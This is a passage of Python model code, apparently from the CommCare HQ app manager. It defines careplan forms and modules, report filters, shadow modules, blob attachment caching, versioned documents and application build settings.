date_followup_path = StringProperty(required=True, default='/data/date_followup')
description_path = StringProperty(required=True, default='/data/description')
close_path = StringProperty(required=True, default='/data/close_goal')
@classmethod
def new_form(cls, lang, name, mode):
action = 'Update' if mode == 'update' else 'New'
form = CareplanGoalForm(mode=mode)
name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
form.name = {lang: name}
if mode == 'update':
form.description_path = '/data/description_group/description'
source = load_form_template('%s_%s.xml' % (form.case_type, mode))
return form, source
def case_updates(self):
changes = self.custom_case_updates.copy()
changes.update({
'date_followup': self.date_followup_path,
'description': self.description_path,
})
return changes
def get_fixed_questions(self):
def q(name, case_key, label):
return {
'name': name,
'key': case_key,
'label': label,
'path': self[name]
}
questions = [
q('description_path', 'description', _('Description')),
q('date_followup_path', 'date_followup', _('Followup date')),
]
if self.mode == 'create':
return [q('name_path', 'name', _('Name'))] + questions
else:
return questions + [q('close_path', 'close', _('Close if'))]
class CareplanTaskForm(CareplanForm):
case_type = CAREPLAN_TASK
name_path = StringProperty(required=True, default='/data/task_repeat/name')
date_followup_path = StringProperty(required=True, default='/data/date_followup')
description_path = StringProperty(required=True, default='/data/description')
latest_report_path = StringProperty(required=True, default='/data/progress_group/progress_update')
close_path = StringProperty(required=True, default='/data/task_complete')
@classmethod
def new_form(cls, lang, name, mode):
action = 'Update' if mode == 'update' else 'New'
form = CareplanTaskForm(mode=mode)
name = name or '%s Careplan %s' % (action, CAREPLAN_CASE_NAMES[form.case_type])
form.name = {lang: name}
if mode == 'create':
form.date_followup_path = '/data/task_repeat/date_followup'
form.description_path = '/data/task_repeat/description'
source = load_form_template('%s_%s.xml' % (form.case_type, mode))
return form, source
def case_updates(self):
changes = self.custom_case_updates.copy()
changes.update({
'date_followup': self.date_followup_path,
})
if self.mode == 'create':
changes['description'] = self.description_path
else:
changes['latest_report'] = self.latest_report_path
return changes
def get_fixed_questions(self):
def q(name, case_key, label):
return {
'name': name,
'key': case_key,
'label': label,
'path': self[name]
}
questions = [
q('date_followup_path', 'date_followup', _('Followup date')),
]
if self.mode == 'create':
return [
q('name_path', 'name', _('Name')),
q('description_path', 'description', _('Description')),
] + questions
else:
return questions + [
q('latest_report_path', 'latest_report', _('Latest report')),
q('close_path', 'close', _('Close if')),
]
class CareplanModule(ModuleBase):
"""
A set of forms and configuration for managing the Care Plan workflow.
"""
module_type = 'careplan'
parent_select = SchemaProperty(ParentSelect)
display_separately = BooleanProperty(default=False)
forms = SchemaListProperty(CareplanForm)
goal_details = SchemaProperty(DetailPair)
task_details = SchemaProperty(DetailPair)
@classmethod
def new_module(cls, name, lang, target_module_id, target_case_type):
lang = lang or 'en'
module = CareplanModule(
name={lang: name or ugettext("Care Plan")},
parent_select=ParentSelect(
active=True,
relationship='parent',
module_id=target_module_id
),
case_type=target_case_type,
goal_details=DetailPair(
short=cls._get_detail(lang, 'goal_short'),
long=cls._get_detail(lang, 'goal_long'),
),
task_details=DetailPair(
short=cls._get_detail(lang, 'task_short'),
long=cls._get_detail(lang, 'task_long'),
)
)
module.get_or_create_unique_id()
return module
@classmethod
def _get_detail(cls, lang, detail_type):
header = ugettext('Goal') if detail_type.startswith('goal') else ugettext('Task')
columns = [
DetailColumn(
format='plain',
header={lang: header},
field='name',
model='case'),
DetailColumn(
format='date',
header={lang: ugettext("Followup")},
field='date_followup',
model='case')]
if detail_type.endswith('long'):
columns.append(DetailColumn(
format='plain',
header={lang: ugettext("Description")},
field='description',
model='case'))
if detail_type == 'tasks_long':
columns.append(DetailColumn(
format='plain',
header={lang: ugettext("Last update")},
field='latest_report',
model='case'))
return Detail(type=detail_type, columns=columns)
def add_insert_form(self, from_module, form, index=None, with_source=False):
if isinstance(form, CareplanForm):
if index:
self.forms.insert(index, form)
else:
self.forms.append(form)
return self.get_form(index or -1)
else:
raise IncompatibleFormTypeException()
def requires_case_details(self):
return True
def get_case_types(self):
return set([self.case_type]) | set(f.case_type for f in self.forms)
def get_form_by_type(self, case_type, mode):
for form in self.get_forms():
if form.case_type == case_type and form.mode == mode:
return form
def get_details(self):
return (
('%s_short' % CAREPLAN_GOAL, self.goal_details.short, True),
('%s_long' % CAREPLAN_GOAL, self.goal_details.long, True),
('%s_short' % CAREPLAN_TASK, self.task_details.short, True),
('%s_long' % CAREPLAN_TASK, self.task_details.long, True),
)
def get_case_errors(self, needs_case_type, needs_case_detail, needs_referral_detail=False):
module_info = self.get_module_info()
if needs_case_type and not self.case_type:
yield {
'type': 'no case type',
'module': module_info,
}
if needs_case_detail:
if not self.goal_details.short.columns:
yield {
'type': 'no case detail for goals',
'module': module_info,
}
if not self.task_details.short.columns:
yield {
'type': 'no case detail for tasks',
'module': module_info,
}
columns = self.goal_details.short.columns + self.goal_details.long.columns
columns += self.task_details.short.columns + self.task_details.long.columns
errors = self.validate_detail_columns(columns)
for error in errors:
yield error
def validate_for_build(self):
errors = super(CareplanModule, self).validate_for_build()
if not self.forms:
errors.append({
'type': 'no forms',
'module': self.get_module_info(),
})
return errors
class ReportGraphConfig(DocumentSchema):
graph_type = StringProperty(
choices=[
'bar',
'time',
'xy',
],
default='bar',
required=True,
)
series_configs = DictProperty(DictProperty)
config = DictProperty()
class ReportAppFilter(DocumentSchema):
@classmethod
def wrap(cls, data):
if cls is ReportAppFilter:
doc_type = data['doc_type']
doc_type_to_filter_class = {
'AutoFilter': AutoFilter,
'CustomDataAutoFilter': CustomDataAutoFilter,
'StaticChoiceFilter': StaticChoiceFilter,
'StaticChoiceListFilter': StaticChoiceListFilter,
'StaticDatespanFilter': StaticDatespanFilter,
'CustomDatespanFilter': CustomDatespanFilter,
'CustomMonthFilter': CustomMonthFilter,
'MobileSelectFilter': MobileSelectFilter,
'AncestorLocationTypeFilter': AncestorLocationTypeFilter,
'NumericFilter': NumericFilter,
}
try:
klass = doc_type_to_filter_class[doc_type]
except KeyError:
raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
else:
return klass.wrap(data)
else:
return super(ReportAppFilter, cls).wrap(data)
def get_filter_value(self, user, ui_filter):
raise NotImplementedError
def _filter_by_case_sharing_group_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [
Choice(value=group._id, display=None)
for group in user.get_case_sharing_groups()
]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id})
def _filter_by_username(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.raw_username, display=None)
def _filter_by_user_id(user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user._id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent})
_filter_type_to_func = {
'case_sharing_group': _filter_by_case_sharing_group_id,
'location_id': _filter_by_location_id,
'parent_location_id': _filter_by_parent_location_id,
'username': _filter_by_username,
'user_id': _filter_by_user_id,
}
class AutoFilter(ReportAppFilter):
filter_type = StringProperty(choices=_filter_type_to_func.keys())
def get_filter_value(self, user, ui_filter):
return _filter_type_to_func[self.filter_type](user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
custom_data_property = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
select_value = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
value = StringListProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.reports_core.filters import Choice
return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
date_range = StringProperty(
choices=[
'last7',
'last30',
'thismonth',
'lastmonth',
'lastyear',
],
required=True,
)
def get_filter_value(self, user, ui_filter):
start_date, end_date = get_daterange_start_end_dates(self.date_range)
return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
operator = StringProperty(
choices=[
'=',
'<=',
'>=',
'>',
'<',
'between'
],
required=True,
)
date_number = StringProperty(required=True)
date_number2 = StringProperty()
def get_filter_value(self, user, ui_filter):
today = datetime.date.today()
start_date = end_date = None
days = int(self.date_number)
if self.operator == 'between':
days2 = int(self.date_number2)
# allows user to have specified the two numbers in either order
if days > days2:
end = days2
start = days
else:
start = days2
end = days
start_date = today - datetime.timedelta(days=start)
end_date = today - datetime.timedelta(days=end)
elif self.operator == '=':
start_date = end_date = today - datetime.timedelta(days=days)
elif self.operator == '>=':
start_date = None
end_date = today - datetime.timedelta(days=days)
elif self.operator == '<=':
start_date = today - datetime.timedelta(days=days)
end_date = None
elif self.operator == '<':
start_date = today - datetime.timedelta(days=days - 1)
end_date = None
elif self.operator == '>':
start_date = None
end_date = today - datetime.timedelta(days=days + 1)
return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
def validate(x):
if not x <= integer:
raise BadValueError('Value must be less than or equal to {}'.format(integer))
return validate
def is_gte(integer):
def validate(x):
if not x >= integer:
raise BadValueError('Value must be greater than or equal to {}'.format(integer))
return validate
class CustomMonthFilter(ReportAppFilter):
"""
Filter by months that start on a day number other than 1
See [FB 215656](http://manage.dimagi.com/default.asp?215656)
"""
# Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
# len(February).
start_of_month = IntegerProperty(
required=True,
validators=(is_gte(-27), is_lte(28))
)
# DateSpan to return i.t.o. number of months to go back
period = IntegerProperty(
default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
validators=(is_gte(0),)
)
@classmethod
def wrap(cls, doc):
doc['start_of_month'] = int(doc['start_of_month'])
if 'period' in doc:
doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
return super(CustomMonthFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
def get_last_month(this_month):
return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)
def get_last_day(date):
_, last_day = calendar.monthrange(date.year, date.month)
return last_day
# Find the start and end dates of period 0
start_of_month = int(self.start_of_month)
end_date = datetime.date.today()
start_day = start_of_month if start_of_month > 0 else get_last_day(end_date) + start_of_month
end_of_month = end_date if end_date.day >= start_day else get_last_month(end_date)
start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
# Loop over months backwards for period > 0
for i in range(int(self.period)):
end_of_month = get_last_month(end_of_month)
end_date = start_date - datetime.timedelta(days=1)
start_day = start_of_month if start_of_month > 0 else get_last_day(end_of_month) + start_of_month
start_date = datetime.date(end_of_month.year, end_of_month.month, start_day)
return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
def get_filter_value(self, user, ui_filter):
return None
class AncestorLocationTypeFilter(ReportAppFilter):
ancestor_location_type_name = StringProperty()
def get_filter_value(self, user, ui_filter):
from corehq.apps.locations.models import SQLLocation
try:
ancestor = user.sql_location.get_ancestors(include_self=True).\
get(location_type__name=self.ancestor_location_type_name)
except (AttributeError, SQLLocation.DoesNotExist):
# user.sql_location is None, or location does not have an ancestor of that type
return None
return ancestor.location_id
class NumericFilter(ReportAppFilter):
operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>=']),
operand = FloatProperty()
@classmethod
def wrap(cls, doc):
doc['operand'] = float(doc['operand'])
return super(NumericFilter, cls).wrap(doc)
def get_filter_value(self, user, ui_filter):
return {
'operator': self.operator,
'operand': self.operand,
}
class ReportAppConfig(DocumentSchema):
"""
Class for configuring how a user configurable report shows up in an app
"""
report_id = StringProperty(required=True)
header = DictProperty()
localized_description = DictProperty()
xpath_description = StringProperty()
use_xpath_description = BooleanProperty(default=False)
graph_configs = DictProperty(ReportGraphConfig)
filters = SchemaDictProperty(ReportAppFilter)
uuid = StringProperty(required=True)
_report = None
def __init__(self, *args, **kwargs):
super(ReportAppConfig, self).__init__(*args, **kwargs)
if not self.uuid:
self.uuid = random_hex()
@classmethod
def wrap(cls, doc):
# for backwards compatibility with apps that have localized or xpath descriptions
old_description = doc.get('description')
if old_description:
if isinstance(old_description, basestring) and not doc.get('xpath_description'):
doc['xpath_description'] = old_description
elif isinstance(old_description, dict) and not doc.get('localized_description'):
doc['localized_description'] = old_description
if not doc.get('xpath_description'):
doc['xpath_description'] = '""'
return super(ReportAppConfig, cls).wrap(doc)
def report(self, domain):
if self._report is None:
from corehq.apps.userreports.models import get_report_config
self._report = get_report_config(self.report_id, domain)[0]
return self._report
class ReportModule(ModuleBase):
"""
Module for user configurable reports
"""
module_type = 'report'
report_configs = SchemaListProperty(ReportAppConfig)
forms = []
_loaded = False
@property
@memoized
def reports(self):
from corehq.apps.userreports.models import get_report_configs
return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)
@classmethod
def new_module(cls, name, lang):
module = ReportModule(
name={(lang or 'en'): name or ugettext("Reports")},
case_type='',
)
module.get_or_create_unique_id()
return module
def get_details(self):
from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_details()
def get_custom_entries(self):
from .suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
return ReportModuleSuiteHelper(self).get_custom_entries()
def get_menus(self, supports_module_filter=False):
kwargs = {}
if supports_module_filter:
kwargs['relevant'] = interpolate_xpath(self.module_filter)
menu = suite_models.LocalizedMenu(
id=id_strings.menu_id(self),
menu_locale_id=id_strings.module_locale(self),
media_image=bool(len(self.all_image_paths())),
media_audio=bool(len(self.all_audio_paths())),
image_locale_id=id_strings.module_icon_locale(self),
audio_locale_id=id_strings.module_audio_locale(self),
**kwargs
)
menu.commands.extend([
suite_models.Command(id=id_strings.report_command(config.uuid))
for config in self.report_configs
])
yield menu
def check_report_validity(self):
"""
returns is_valid, valid_report_configs
If any report doesn't exist, is_valid is False, otherwise True
valid_report_configs is a list of all report configs that refer to existing reports
"""
try:
all_report_ids = [report._id for report in self.reports]
valid_report_configs = [report_config for report_config in self.report_configs
if report_config.report_id in all_report_ids]
is_valid = (len(valid_report_configs) == len(self.report_configs))
except ReportConfigurationNotFoundError:
valid_report_configs = [] # assuming that if one report is in a different domain, they all are
is_valid = False
return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
is_valid=is_valid,
valid_report_configs=valid_report_configs
)
def validate_for_build(self):
errors = super(ReportModule, self).validate_for_build()
if not self.check_report_validity().is_valid:
errors.append({
'type': 'report config ref invalid',
'module': self.get_module_info()
})
return errors
class ShadowModule(ModuleBase, ModuleDetailsMixin):
"""
A module that acts as a shortcut to another module. This module has its own
settings (name, icon/audio, filter, etc.) and its own case list/detail, but
inherits case type and forms from its source module.
"""
module_type = 'shadow'
source_module_id = StringProperty()
forms = []
excluded_form_ids = SchemaListProperty()
case_details = SchemaProperty(DetailPair)
ref_details = SchemaProperty(DetailPair)
put_in_root = BooleanProperty(default=False)
case_list = SchemaProperty(CaseList)
referral_list = SchemaProperty(CaseList)
task_list = SchemaProperty(CaseList)
parent_select = SchemaProperty(ParentSelect)
get_forms = IndexedSchema.Getter('forms')
@classmethod
def wrap(cls, data):
data = cls.wrap_details(data)
return super(ShadowModule, cls).wrap(data)
@property
def source_module(self):
if self.source_module_id:
try:
return self._parent.get_module_by_unique_id(self.source_module_id)
except ModuleNotFoundException:
pass
return None
@property
def case_type(self):
if not self.source_module:
return None
return self.source_module.case_type
@property
def requires(self):
if not self.source_module:
return 'none'
return self.source_module.requires
@property
def root_module_id(self):
if not self.source_module:
return None
return self.source_module.root_module_id
def get_suite_forms(self):
if not self.source_module:
return []
return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]
@parse_int([1])
def get_form(self, i):
return None
def requires_case_details(self):
if not self.source_module:
return False
return self.source_module.requires_case_details()
def get_case_types(self):
if not self.source_module:
return []
return self.source_module.get_case_types()
@memoized
def get_subcase_types(self):
if not self.source_module:
return []
return self.source_module.get_subcase_types()
@memoized
def all_forms_require_a_case(self):
if not self.source_module:
return []
return self.source_module.all_forms_require_a_case()
@classmethod
def new_module(cls, name, lang):
lang = lang or 'en'
detail = Detail(
columns=[DetailColumn(
format='plain',
header={(lang or 'en'): ugettext("Name")},
field='name',
model='case',
)]
)
module = ShadowModule(
name={(lang or 'en'): name or ugettext("Untitled Module")},
case_details=DetailPair(
short=Detail(detail.to_json()),
long=Detail(detail.to_json()),
),
)
module.get_or_create_unique_id()
return module
def validate_for_build(self):
errors = super(ShadowModule, self).validate_for_build()
errors += self.validate_details_for_build()
if not self.source_module:
errors.append({
'type': 'no source module id',
'module': self.get_module_info()
})
return errors
class LazyBlobDoc(BlobMixin):
"""LazyAttachmentDoc for blob db
Cache blobs in local memory (for this request)
and in django cache (for the next few requests)
and commit to couchdb.
See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
Cache strategy:
- on fetch, check in local memory, then cache
- if both are a miss, fetch from couchdb and store in both
- after an attachment is committed to the blob db and the
save save has succeeded, save the attachment in the cache
"""
migrating_blobs_from_couch = True
def __init__(self, *args, **kwargs):
super(LazyBlobDoc, self).__init__(*args, **kwargs)
self._LAZY_ATTACHMENTS = {}
# to cache fetched attachments
# these we do *not* send back down upon save
self._LAZY_ATTACHMENTS_CACHE = {}
@classmethod
def wrap(cls, data):
if "_attachments" in data:
data = data.copy()
attachments = data.pop("_attachments").copy()
if cls.migrating_blobs_from_couch:
# preserve stubs so couch attachments don't get deleted on save
stubs = {}
for name, value in list(attachments.items()):
if isinstance(value, dict) and "stub" in value:
stubs[name] = attachments.pop(name)
if stubs:
data["_attachments"] = stubs
else:
attachments = None
self = super(LazyBlobDoc, cls).wrap(data)
if attachments:
for name, attachment in attachments.items():
if isinstance(attachment, basestring):
info = {"content": attachment}
else:
raise ValueError("Unknown attachment format: {!r}"
.format(attachment))
self.lazy_put_attachment(name=name, **info)
return self
def __attachment_cache_key(self, name):
return u'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
def __set_cached_attachment(self, name, content):
cache.set(self.__attachment_cache_key(name), content, timeout=60 * 60 * 24)
self._LAZY_ATTACHMENTS_CACHE[name] = content
def __get_cached_attachment(self, name):
try:
# it has been fetched already during this request
content = self._LAZY_ATTACHMENTS_CACHE[name]
except KeyError:
content = cache.get(self.__attachment_cache_key(name))
if content is not None:
self._LAZY_ATTACHMENTS_CACHE[name] = content
return content
def put_attachment(self, content, name=None, *args, **kw):
cache.delete(self.__attachment_cache_key(name))
self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
def lazy_put_attachment(self, content, name=None, content_type=None,
content_length=None):
"""
Ensure the attachment is available through lazy_fetch_attachment
and that upon self.save(), the attachments are put to the doc as well
"""
self._LAZY_ATTACHMENTS[name] = {
'content': content,
'content_type': content_type,
'content_length': content_length,
}
def lazy_fetch_attachment(self, name):
# it has been put/lazy-put already during this request
if name in self._LAZY_ATTACHMENTS:
content = self._LAZY_ATTACHMENTS[name]['content']
else:
content = self.__get_cached_attachment(name)
if content is None:
try:
content = self.fetch_attachment(name)
except ResourceNotFound as e:
# django cache will pickle this exception for you
# but e.response isn't picklable
if hasattr(e, 'response'):
del e.response
content = e
raise
finally:
self.__set_cached_attachment(name, content)
if isinstance(content, ResourceNotFound):
raise content
return content
def lazy_list_attachments(self):
keys = set()
keys.update(getattr(self, '_LAZY_ATTACHMENTS', None) or {})
keys.update(self.blobs or {})
return keys
def save(self, **params):
def super_save():
super(LazyBlobDoc, self).save(**params)
if self._LAZY_ATTACHMENTS:
with self.atomic_blobs(super_save):
for name, info in self._LAZY_ATTACHMENTS.items():
if not info['content_type']:
info['content_type'] = ';'.join(filter(None, guess_type(name)))
super(LazyBlobDoc, self).put_attachment(name=name, **info)
# super_save() has succeeded by now
for name, info in self._LAZY_ATTACHMENTS.items():
self.__set_cached_attachment(name, info['content'])
self._LAZY_ATTACHMENTS.clear()
else:
super_save()
class VersionedDoc(LazyBlobDoc):
"""
A document that keeps an auto-incrementing version number, knows how to make copies of itself,
delete a copy of itself, and revert back to an earlier copy of itself.
"""
domain = StringProperty()
copy_of = StringProperty()
version = IntegerProperty()
short_url = StringProperty()
short_odk_url = StringProperty()
short_odk_media_url = StringProperty()
_meta_fields = ['_id', '_rev', 'domain', 'copy_of', 'version', 'short_url', 'short_odk_url', 'short_odk_media_url']
@property
def id(self):
return self._id
def save(self, response_json=None, increment_version=None, **params):
if increment_version is None:
increment_version = not self.copy_of
if increment_version:
self.version = self.version + 1 if self.version else 1
super(VersionedDoc, self).save(**params)
if response_json is not None:
if 'update' not in response_json:
response_json['update'] = {}
response_json['update']['app-version'] = self.version
def make_build(self):
assert self.get_id
assert self.copy_of is None
cls = self.__class__
copies = cls.view('app_manager/applications', key=[self.domain, self._id, self.version], include_docs=True, limit=1).all()
if copies:
copy = copies[0]
else:
copy = deepcopy(self.to_json())
bad_keys = ('_id', '_rev', '_attachments', 'external_blobs',
'short_url', 'short_odk_url', 'short_odk_media_url', 'recipients')
for bad_key in bad_keys:
if bad_key in copy:
del copy[bad_key]
copy = cls.wrap(copy)
copy['copy_of'] = self._id
copy.copy_attachments(self)
return copy
def copy_attachments(self, other, regexp=ATTACHMENT_REGEX):
for name in other.lazy_list_attachments() or {}:
if regexp is None or re.match(regexp, name):
self.lazy_put_attachment(other.lazy_fetch_attachment(name), name)
def make_reversion_to_copy(self, copy):
"""
Replaces couch doc with a copy of the backup ("copy").
Returns the another Application/RemoteApp referring to this
updated couch doc. The returned doc should be used in place of
the original doc, i.e. should be called as follows:
app = app.make_reversion_to_copy(copy)
app.save()
"""
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
app = deepcopy(copy.to_json())
app['_rev'] = self._rev
app['_id'] = self._id
app['version'] = self.version
app['copy_of'] = None
app.pop('_attachments', None)
app.pop('external_blobs', None)
cls = self.__class__
app = cls.wrap(app)
app.copy_attachments(copy)
return app
def delete_copy(self, copy):
if copy.copy_of != self._id:
raise VersioningError("%s is not a copy of %s" % (copy, self))
copy.delete_app()
copy.save(increment_version=False)
def scrub_source(self, source):
"""
To be overridden.
Use this to scrub out anything
that should be shown in the
application source, such as ids, etc.
"""
return source
def export_json(self, dump_json=True):
source = deepcopy(self.to_json())
for field in self._meta_fields:
if field in source:
del source[field]
_attachments = {}
for name in self.lazy_list_attachments():
if re.match(ATTACHMENT_REGEX, name):
# FIXME loss of metadata (content type, etc.)
_attachments[name] = self.lazy_fetch_attachment(name)
# the '_attachments' value is a dict of `name: blob_content`
# pairs, and is part of the exported (serialized) app interface
source['_attachments'] = _attachments
source.pop("external_blobs", None)
source = self.scrub_source(source)
return json.dumps(source) if dump_json else source
@classmethod
def from_source(cls, source, domain):
for field in cls._meta_fields:
if field in source:
del source[field]
source['domain'] = domain
app = cls.wrap(source)
return app
def is_deleted(self):
return self.doc_type.endswith(DELETED_SUFFIX)
def unretire(self):
self.doc_type = self.get_doc_type()
self.save()
def get_doc_type(self):
if self.doc_type.endswith(DELETED_SUFFIX):
return self.doc_type[:-len(DELETED_SUFFIX)]
else:
return self.doc_type
def absolute_url_property(method):
"""
Helper for the various fully qualified application URLs
Turns a method returning an unqualified URL
into a property returning a fully qualified URL
(e.g., '/my_url/' => 'https://www.commcarehq.org/my_url/')
Expects `self.url_base` to be fully qualified url base
"""
@wraps(method)
def _inner(self):
return "%s%s" % (self.url_base, method(self))
return property(_inner)
class BuildProfile(DocumentSchema):
name = StringProperty()
langs = StringListProperty()
def __eq__(self, other):
return self.langs == other.langs
def __ne__(self, other):
return not self.__eq__(other)
class MediaList(DocumentSchema):
media_refs = StringListProperty()
class ApplicationBase(VersionedDoc, SnapshotMixin,
CommCareFeatureSupportMixin,
CommentMixin):
"""
Abstract base class for Application and RemoteApp.
Contains methods for generating the various files and zipping them into CommCare.jar
See note at top of file for high-level overview.
"""
recipients = StringProperty(default="")
# this is the supported way of specifying which commcare build to use
build_spec = SchemaProperty(BuildSpec)
platform = StringProperty(
choices=["nokia/s40", "nokia/s60", "winmo", "generic"],
default="nokia/s40"
)
text_input = StringProperty(
choices=['roman', 'native', 'custom-keys', 'qwerty'],
default="roman"
)
# The following properties should only appear on saved builds
# built_with stores a record of CommCare build used in a saved app
built_with = SchemaProperty(BuildRecord)
build_signed = BooleanProperty(default=True)
built_on = DateTimeProperty(required=False)
build_comment = StringProperty()
comment_from = StringProperty()
build_broken = BooleanProperty(default=False)
# not used yet, but nice for tagging/debugging
# currently only canonical value is 'incomplete-build',
# for when build resources aren't found where they should be
build_broken_reason = StringProperty()
# watch out for a past bug:
# when reverting to a build that happens to be released
# that got copied into into the new app doc, and when new releases were made,
# they were automatically starred
# AFAIK this is fixed in code, but my rear its ugly head in an as-yet-not-understood
# way for apps that already had this problem. Just keep an eye out
is_released = BooleanProperty(default=False)
# django-style salted hash of the admin password
admin_password = StringProperty()
# a=Alphanumeric, n=Numeric, x=Neither (not allowed)
admin_password_charset = StringProperty(choices=['a', 'n', 'x'], default='n')
# This is here instead of in Application because it needs to be available in stub representation
application_version = StringProperty(default=APP_V2, choices=[APP_V1, APP_V2], required=False)
langs = StringListProperty()
secure_submissions = BooleanProperty(default=False)
# metadata for data platform
amplifies_workers = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
amplifies_project = StringProperty(
choices=[AMPLIFIES_YES, AMPLIFIES_NO, AMPLIFIES_NOT_SET],
default=AMPLIFIES_NOT_SET
)
minimum_use_threshold = StringProperty(
default='15'
)
experienced_threshold = StringProperty(
default='3'
)
# exchange properties
cached_properties = DictProperty()
description = StringProperty()
deployment_date = DateTimeProperty()
phone_model = StringProperty()
user_type = StringProperty()
attribution_notes = StringProperty()
# always false for RemoteApp
case_sharing = BooleanProperty(default=False)
vellum_case_management = BooleanProperty(default=False)
build_profiles = SchemaDictProperty(BuildProfile)
# each language is a key and the value is a list of multimedia referenced in that language
media_language_map = SchemaDictProperty(MediaList)
use_j2me_endpoint = BooleanProperty(default=False)
# Whether or not the Application has had any forms submitted against it
has_submissions = BooleanProperty(default=False)
@classmethod
def wrap(cls, data):
should_save = False
# scrape for old conventions and get rid of them
if 'commcare_build' in data:
version, build_number = data['commcare_build'].split('/')
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_build']
if 'commcare_tag' in data:
version, build_number = current_builds.TAG_MAP[data['commcare_tag']]
data['build_spec'] = BuildSpec.from_string("%s/latest" % version).to_json()
del data['commcare_tag']
if data.has_key("built_with") and isinstance(data['built_with'], basestring):
data['built_with'] = BuildSpec.from_string(data['built_with']).to_json()
if 'native_input' in data:
if 'text_input' not in data:
data['text_input'] = 'native' if data['native_input'] else 'roman'
del data['native_input']
if 'build_langs' in data:
if data['build_langs'] != data['langs'] and 'build_profiles' not in data:
data['build_profiles'] = {
uuid.uuid4().hex: dict(
name=', '.join(data['build_langs']),
langs=data['build_langs']
)
}
should_save = True
del data['build_langs']
if data.has_key('original_doc'):
data['copy_history'] = [data.pop('original_doc')]
should_save = True
data["description"] = data.get('description') or data.get('short_description')
self = super(ApplicationBase, cls).wrap(data)
if not self.build_spec or self.build_spec.is_null():
self.build_spec = get_default_build_spec(self.application_version)
if should_save:
self.save()
return self
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
def is_remote_app(self):
return False
def get_latest_app(self, released_only=True):
if released_only:
return get_app(self.domain, self.get_id, latest=True)
else:
return self.view('app_manager/applications',
startkey=[self.domain, self.get_id, {}],
endkey=[self.domain, self.get_id],
include_docs=True,
limit=1,
descending=True,
).first()
@memoized
def get_latest_saved(self):
"""
This looks really similar to get_latest_app, not sure why tim added
"""
doc = (get_latest_released_app_doc(self.domain, self._id) or
get_latest_build_doc(self.domain, self._id))
return self.__class__.wrap(doc) if doc else None
def set_admin_password(self, raw_password):
salt = os.urandom(5).encode('hex')
self.admin_password = make_password(raw_password, salt=salt)
if raw_password.isnumeric():
self.admin_password_charset = 'n'
elif raw_password.isalnum():
self.admin_password_charset = 'a'
else:
self.admin_password_charset = 'x'
def check_password_charset(self):
errors = []
if hasattr(self, 'profile'):
password_format = self.profile.get('properties', {}).get('password_format', 'n')
message = ('Your app requires {0} passwords '
'but the admin password is not {0}')
if password_format == 'n' and self.admin_password_charset in 'ax':
errors.append({'type': 'password_format',
'message': message.format('numeric')})
if password_format == 'a' and self.admin_password_charset in 'x':
errors.append({'type': 'password_format',
'message': message.format('alphanumeric')})
return errors
def get_build(self):
return self.build_spec.get_build()
@property
def build_version(self):
# `LooseVersion`s are smart!
# LooseVersion('2.12.0') > '2.2'
# (even though '2.12.0' < '2.2')
if self.build_spec.version:
return LooseVersion(self.build_spec.version)
@property
def commcare_minor_release(self):
"""This is mostly just for views"""
return '%d.%d' % self.build_spec.minor_release()
@property
def short_name(self):
return self.name if len(self.name) <= 12 else '%s..' % self.name[:10]
@property
def has_careplan_module(self):
return False
@property
def url_base(self):
custom_base_url = getattr(self, 'custom_base_url', None)
return custom_base_url or get_url_base()
@absolute_url_property
def post_url(self):
if self.secure_submissions:
url_name = 'receiver_secure_post_with_app_id'
else:
url_name = 'receiver_post_with_app_id'
return reverse(url_name, args=[self.domain, self.get_id])
@absolute_url_property
def key_server_url(self):
return reverse('key_server_url', args=[self.domain])
@absolute_url_property
def ota_restore_url(self):
return reverse('app_aware_restore', args=[self.domain, self._id])
@absolute_url_property
def form_record_url(self):
return '/a/%s/api/custom/pact_formdata/v1/' % self.domain
@absolute_url_property
def hq_profile_url(self):
# RemoteApp already has a property called "profile_url",
# Application.profile_url just points here to stop the conflict
# http://manage.dimagi.com/default.asp?227088#1149422
return "%s?latest=true" % (
